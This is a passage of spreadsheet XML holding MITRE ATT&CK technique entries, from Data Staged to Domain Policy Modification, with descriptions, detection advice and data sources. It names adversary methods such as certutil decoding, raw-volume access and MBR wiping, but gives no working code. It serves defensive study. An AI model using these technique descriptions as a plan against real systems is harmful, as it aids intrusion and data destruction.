Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1074</t>
  </si>
  <si>
    <t>Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, File: File Creation</t>
  </si>
  <si>
    <t>Praetorian; Shane Tully, @securitygypsy</t>
  </si>
  <si>
    <t>T1074.001</t>
  </si>
  <si>
    <t>Data Staged: Local Data Staging</t>
  </si>
  <si>
    <t>Adversaries may stage collected data in a central location or directory on the local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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1074/001</t>
  </si>
  <si>
    <t>13 March 2020</t>
  </si>
  <si>
    <t>T1074.002</t>
  </si>
  <si>
    <t>Data Staged: Remote Data Staging</t>
  </si>
  <si>
    <t>Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1074/002</t>
  </si>
  <si>
    <t>T1030</t>
  </si>
  <si>
    <t>Data Transfer Size Limits</t>
  </si>
  <si>
    <t>An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1030</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). If a process maintains a long connection during which it consistently sends fixed size data packets or a process opens connections and sends fixed sized data packets at regular intervals, it may be performing an aggregate data transfer.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t>
  </si>
  <si>
    <t>T1530</t>
  </si>
  <si>
    <t>Data from Cloud Storage Object</t>
  </si>
  <si>
    <t>Adversaries may access data objects from improperly secured cloud storage.
Many cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. Solution providers typically offer security guides to help end users configure systems.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019)
Misconfiguration by end users is a common problem. There have been numerous incidents where cloud storage has been improperly secured (typically by unintentionally allowing public access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017) Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1530</t>
  </si>
  <si>
    <t>Monitor for unusual queries to the cloud provider's storage service. Activity originating from unexpected sources may indicate improper permissions are set that is allowing access to data. Additionally, detecting failed attempts by a user for a certain object, followed by escalation of privileges by the same user, and access to the same object may be an indication of suspicious activity.</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Access</t>
  </si>
  <si>
    <t>Netskope; Praetorian</t>
  </si>
  <si>
    <t>T1602</t>
  </si>
  <si>
    <t>Data from Configuration Repository</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</si>
  <si>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
Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1602</t>
  </si>
  <si>
    <t>Identify network traffic sent or received by untrusted hosts or networks that solicits and obtains the configuration information of the queried device.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>T1602.002</t>
  </si>
  <si>
    <t>Data from Configuration Repository: Network Device Configuration Dump</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.
Adversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files. (Citation: US-CERT TA18-106A Network Infrastructure Devices 2018) (Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1602/002</t>
  </si>
  <si>
    <t>Identify network traffic sent or received by untrusted hosts or networks. Configure signatures to identify strings that may be found in a network device configuration. (Citation: US-CERT TA18-068A 2018)</t>
  </si>
  <si>
    <t>T1602.001</t>
  </si>
  <si>
    <t>Data from Configuration Repository: SNMP (MIB Dump)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).
The MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight in their systems, such as, system information, description of hardware, physical location, and software packages(Citation: SANS Information Security Reading Room Securing SNMP Securing SNMP). The MIB may also contain device operational information, including running configuration, routing table, and interface details.
Adversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1602/001</t>
  </si>
  <si>
    <t>Identify network traffic sent or received by untrusted hosts or networks that expose MIB content or use unauthorized protocols.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)</t>
  </si>
  <si>
    <t>T1213</t>
  </si>
  <si>
    <t>Data from Information Repositories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</si>
  <si>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
The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include [Sharepoint](https://attack.mitre.org/techniques/T1213/002), [Confluence](https://attack.mitre.org/techniques/T1213/001), and enterprise databases such as SQL Server.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1213</t>
  </si>
  <si>
    <t>3.1</t>
  </si>
  <si>
    <t>As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally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The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.</t>
  </si>
  <si>
    <t>Google Workspace, Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Logon Session: Logon Session Creation</t>
  </si>
  <si>
    <t>Milos Stojadinovic; Praetorian</t>
  </si>
  <si>
    <t>T1213.001</t>
  </si>
  <si>
    <t>Data from Information Repositories: Confluence</t>
  </si>
  <si>
    <t xml:space="preserve">
Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1213/001</t>
  </si>
  <si>
    <t>14 February 2020</t>
  </si>
  <si>
    <t>Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should not generally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User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.</t>
  </si>
  <si>
    <t>SaaS</t>
  </si>
  <si>
    <t>T1213.002</t>
  </si>
  <si>
    <t>Data from Information Repositories: Sharepoint</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1213/002</t>
  </si>
  <si>
    <t xml:space="preserve">The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging). As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. 
</t>
  </si>
  <si>
    <t>T1005</t>
  </si>
  <si>
    <t>Data from Local System</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1005</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to collect files from a system.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t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access</t>
  </si>
  <si>
    <t>T1039</t>
  </si>
  <si>
    <t>Data from Network Shared Drive</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</si>
  <si>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[cmd](https://attack.mitre.org/software/S0106) may be used to gather information.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1039</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to collect files from a network share.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t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Network Share: Network Share Access</t>
  </si>
  <si>
    <t>T1025</t>
  </si>
  <si>
    <t>Data from Removable Media</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</si>
  <si>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[cmd](https://attack.mitre.org/software/S0106) may be used to gather information. 
Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1025</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to collect files from a system's connected removable media. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).</t>
  </si>
  <si>
    <t>T1491</t>
  </si>
  <si>
    <t>Defacement</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may modify visual content available internally or externally to an enterprise network. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages. 
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1491</t>
  </si>
  <si>
    <t>08 April 2019</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor internal and external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.
</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, File: File Creation, File: File Modification, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>T1491.002</t>
  </si>
  <si>
    <t>Defacement: External Defacement</t>
  </si>
  <si>
    <t>An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1491/002</t>
  </si>
  <si>
    <t>Monitor external websites for unplanned content changes. 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</si>
  <si>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T1491.001</t>
  </si>
  <si>
    <t>Defacement: Internal Defacement</t>
  </si>
  <si>
    <t>An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1491/001</t>
  </si>
  <si>
    <t>Monitor internal and websites for unplanned content changes. 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</si>
  <si>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T1140</t>
  </si>
  <si>
    <t>Deobfuscate/Decode Files or Information</t>
  </si>
  <si>
    <t>Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
One such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows &lt;code&gt;copy /b&lt;/code&gt; command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)
Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1140</t>
  </si>
  <si>
    <t>09 July 2020</t>
  </si>
  <si>
    <t>Detecting the action of deobfuscating or decoding files or information may be difficult depending on the implementation. If the functionality is contained within malware and uses the Windows API, then attempting to detect malicious behavior before or after the action may yield better results than attempting to perform analysis on loaded libraries or API calls. If scripts are used, then collecting the scripts for analysis may be necessary. Perform process and command-line monitoring to detect potentially malicious behavior related to scripts and system utilities such as [certutil](https://attack.mitre.org/software/S0160).
Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.</t>
  </si>
  <si>
    <t>File: File Modification, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>Matthew Demaske, Adaptforward; Red Canary</t>
  </si>
  <si>
    <t>Anti-virus, Host intrusion prevention systems, Network intrusion detection system, Signature-based detection</t>
  </si>
  <si>
    <t>T1610</t>
  </si>
  <si>
    <t>Deploy Container</t>
  </si>
  <si>
    <t>Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment.
Containers can be deployed by various means, such as via Docker's &lt;code&gt;create&lt;/code&gt; and &lt;code&gt;start&lt;/code&gt; APIs or via a web application such as the Kubernetes dashboard or Kubeflow.(Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1610</t>
  </si>
  <si>
    <t>Defense Evasion, Execution</t>
  </si>
  <si>
    <t>Monitor for suspicious or unknown container images and pods in your environment. Deploy logging agents on Kubernetes nodes and retrieve logs from sidecar proxies for application pods to detect malicious activity at the cluster level. In Docker, the daemon log provides insight into remote API calls, including those that deploy containers. Logs for management services or applications used to deploy containers other than the native technologies themselves should also be monitored.</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Container: Container Creation, Container: Container Start, Pod: Pod Creation, Pod: Pod Modification</t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro; Ariel Shuper, Cisco; Center for Threat-Informed Defense (CTID); Idan Frimark, Cisco; Magno Logan, @magnologan, Trend Micro; Pawan Kinger, @kingerpawan, Trend Micro; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1587</t>
  </si>
  <si>
    <t>Develop Capabilities</t>
  </si>
  <si>
    <t>Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
As with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1587</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.</t>
  </si>
  <si>
    <t>T1587.002</t>
  </si>
  <si>
    <t>Develop Capabilities: Code Signing Certificates</t>
  </si>
  <si>
    <t>Adversaries may create self-signed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develop self-signed code signing certificates for use in operations.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1587/002</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).</t>
  </si>
  <si>
    <t>T1587.003</t>
  </si>
  <si>
    <t>Develop Capabilities: Digital Certificates</t>
  </si>
  <si>
    <t>Adversaries may create self-signed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In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
Adversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)).
After creating a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1587/003</t>
  </si>
  <si>
    <t>Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).</t>
  </si>
  <si>
    <t>T1587.004</t>
  </si>
  <si>
    <t>Develop Capabilities: Exploits</t>
  </si>
  <si>
    <t>Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
As with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.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</si>
  <si>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https://attack.mitre.org/techniques/T1587/004</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits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</si>
  <si>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T1587.001</t>
  </si>
  <si>
    <t>Develop Capabilities: Malware</t>
  </si>
  <si>
    <t>Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
As with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.
Some aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1587/001</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.</t>
  </si>
  <si>
    <t>T1006</t>
  </si>
  <si>
    <t>Direct Volume Access</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</si>
  <si>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bypasses Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)
Utilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Citation: Github PowerSploit Ninjacopy)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1006</t>
  </si>
  <si>
    <t>Monitor handle opens on drive volumes that are made by processes to determine when they may directly access logical drives. (Citation: Github PowerSploit Ninjacopy)
Monitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through [PowerShell](https://attack.mitre.org/techniques/T1059/001), additional logging of PowerShell scripts is recommended.</t>
  </si>
  <si>
    <t>Command: Command Execution, Drive: Drive Access</t>
  </si>
  <si>
    <t>File monitoring, File system access controls</t>
  </si>
  <si>
    <t>T1561</t>
  </si>
  <si>
    <t>Disk Wipe</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</si>
  <si>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
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1561</t>
  </si>
  <si>
    <t>Look for attempts to read/write to sensitive locations like the partition boot sector, master boot record, disk partition table, or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the &lt;code&gt;\\\\.\\&lt;/code&gt; notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.</t>
  </si>
  <si>
    <t>Command: Command Execution, Drive: Drive Access, Drive: Drive Modification, Driver: Driver Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1561.001</t>
  </si>
  <si>
    <t>Disk Wipe: Disk Content Wipe</t>
  </si>
  <si>
    <t>Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.
Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1561/001</t>
  </si>
  <si>
    <t>Look for attempts to read/write to sensitive locations like the partition boot sector or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the &lt;code&gt;\\\\.\\&lt;/code&gt; notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.</t>
  </si>
  <si>
    <t>T1561.002</t>
  </si>
  <si>
    <t>Disk Wipe: Disk Structure Wipe</t>
  </si>
  <si>
    <t>Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. 
Adversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped.
To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1561/002</t>
  </si>
  <si>
    <t>Look for attempts to read/write to sensitive locations like the master boot record and the disk partition table. Monitor for direct access read/write attempts using the &lt;code&gt;\\\\.\\&lt;/code&gt; notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.</t>
  </si>
  <si>
    <t>T1484</t>
  </si>
  <si>
    <t>Domain Policy Modification</t>
  </si>
  <si>
    <t>Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments. Domains provide a centralized means of managing how computer resources (ex: computers, user accounts) can act, and interact with each other, on a network. The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or changing trust settings for domains, including federation trusts.
With sufficient permissions, adversaries can modify domain policy settings. Since domain configuration settings control many of the interactions within the Active Directory (AD) environment, there are a great number of potential attacks that can stem from this abuse. Examples of such abuse include modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) or modifying domain trusts to include an adversary controlled domain where they can control access tokens that will subsequently be accepted by victim domain resources.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks) Adversaries can also change configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207).
Adversaries may temporarily modify domain policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1484</t>
